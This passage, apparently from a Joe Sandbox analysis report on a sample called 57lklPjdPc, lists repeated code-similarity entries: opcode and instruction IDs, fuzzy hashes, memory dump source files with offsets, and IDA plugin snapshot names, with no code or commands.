                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4201173357.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_30b0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c71f6edf1b40f0d0707f996c3674ebfc6ddeafd7a0c0e994817f23229a5ec7c9
                                  • Instruction ID: a8c1dba6c325e33820e62408d85c64cc8f738d3c0c6de12d54e6a7f767b0f432
                                  • Opcode Fuzzy Hash: c71f6edf1b40f0d0707f996c3674ebfc6ddeafd7a0c0e994817f23229a5ec7c9
                                  • Instruction Fuzzy Hash: 8D90027204460C8B495427957409555B79C95446157904051B94D4250AAAA665104A95
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4201173357.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_30b0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75e430280eba8279258aab2660fa586ca5582c196f9e492e3402636f61a6d698
                                  • Instruction ID: 682898ea7a2e39d7a874537ef96b33c059a01f0e9ab5f0bb48e45ee3590fdb7e
                                  • Opcode Fuzzy Hash: 75e430280eba8279258aab2660fa586ca5582c196f9e492e3402636f61a6d698
                                  • Instruction Fuzzy Hash: E490023504460C8B468637957449655779CA5485197840052B50D415455A95745085E5
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4201173357.00000000030B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_30b0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4216844174.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5d90000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4216844174.0000000005D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D90000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5d90000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4218665662.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6630000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4218665662.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6630000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4218665662.0000000006630000.00000040.00000800.00020000.00000000.sdmp, Offset: 06630000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6630000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4c9c210e347a8b265ced7babccc5a55996d907049c69ff2bba0b12cec7d5f4b5
                                  • Instruction ID: 2118ca87c8e28f9bae9eadebbe935146e12cb01baaceaabefe5bf2502867d039
                                  • Opcode Fuzzy Hash: 4c9c210e347a8b265ced7babccc5a55996d907049c69ff2bba0b12cec7d5f4b5
                                  • Instruction Fuzzy Hash: 4290023105460C8B45402799750A6567B9CD5445157804052B50D41642AEA56D108696
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4221458813.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4221458813.0000000006FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FA0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6fa0000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6f5f02352f739e5afb513c571058d6d27dcd5b208301876ac014904e291236cb
                                  • Instruction ID: f13c7d84a485210c4c08d02cd4709748781f236a56090cd1d94cf55e9dd197a8
                                  • Opcode Fuzzy Hash: 6f5f02352f739e5afb513c571058d6d27dcd5b208301876ac014904e291236cb
                                  • Instruction Fuzzy Hash: 0EB01276C03258CFD740CF90E40479D7BB2BB44300F010035850AB3A40CB740C40CB81
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4220670056.0000000006F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F30000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_6f30000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92c7c94fc13a9302f111f4568320116df0a527b76e3d6ebfa4940538f4b723c1
                                  • Instruction ID: 03a56aca94d8529d95c8e4b6fb81eef09c6734fa49743abba484ed6e3b4243d4
                                  • Opcode Fuzzy Hash: 92c7c94fc13a9302f111f4568320116df0a527b76e3d6ebfa4940538f4b723c1
                                  • Instruction Fuzzy Hash: B7A002787C62046AEE2056626E0FF8539555790B01F1610407309584C249D1108085B7
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4221991417.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7000000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: eefc3b28091fd1dfb48f872602ea069423b74f5324fcc72048fb5510703d6a9f
                                  • Instruction ID: da48cd9f9a8bf6fdd48851fa948499d1333d92639fb4f61e9009427ccbe47688
                                  • Opcode Fuzzy Hash: eefc3b28091fd1dfb48f872602ea069423b74f5324fcc72048fb5510703d6a9f
                                  • Instruction Fuzzy Hash: 42B01279029100A6D10006C04504F0975215724721F004000F3190808142B044009B13
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4221991417.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7000000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4215802505.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c70000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction ID: 424522431131923360a2424e5b60fcaca403654da384226d21dcd1d1d325544f
                                  • Opcode Fuzzy Hash: 848e7b2b3d1d7438aceb18ee9ce77d60f8a3148b9db338e3d364b5add5ce48b1
                                  • Instruction Fuzzy Hash: B3A001746050109B8689DA58D991818B7A2ABC9219728C4ADA819CB25ACF33E9039A44
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4222108082.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7010000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4975a81b33fe5ec1e9c065c64d0a5dc685e4c9e256b9edfb97bea8be19bbdbd5
                                  • Instruction ID: caf06ba54b70af71634249f0af97afb5f8c3953e1727784b0c8b06e5edb3788c
                                  • Opcode Fuzzy Hash: 4975a81b33fe5ec1e9c065c64d0a5dc685e4c9e256b9edfb97bea8be19bbdbd5
                                  • Instruction Fuzzy Hash: 4DB09274A10008DBCB1A8F00E45489D7B32BF44300F60C100FC2206264CB309951CF40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4222254151.0000000007110000.00000040.00000800.00020000.00000000.sdmp, Offset: 07110000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7110000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 97e637e8c44eddb8880e5c7443b73d2a6235e01832c828397acbef00ee50266d
                                  • Instruction ID: fdf0c834859b6747565693d427aff188f581861df3f096c4bd03985b7663a0f2
                                  • Opcode Fuzzy Hash: 97e637e8c44eddb8880e5c7443b73d2a6235e01832c828397acbef00ee50266d
                                  • Instruction Fuzzy Hash: 0590023904560C8B554067D57409565B79D96545257804051E60E419036B6564514596
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4216621102.0000000005D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5d70000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4221991417.0000000007000000.00000040.00000800.00020000.00000000.sdmp, Offset: 07000000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_7000000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.4215802505.0000000005C70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05C70000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5c70000_57lklPjdPc.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                  • Instruction ID: 2108930940694c1c8b8ad4272d9396267f2db374b9021a0985f6588530823504
                                  • Opcode Fuzzy Hash: 584a3913bed7d41f6751d29dc0af2e109adf5df94d8de11209de24b86f245c04
                                  • Instruction Fuzzy Hash: 6BA002742010009BC644DB54C991814F761EFC5219728C4DDA8198B256CF33ED03DA40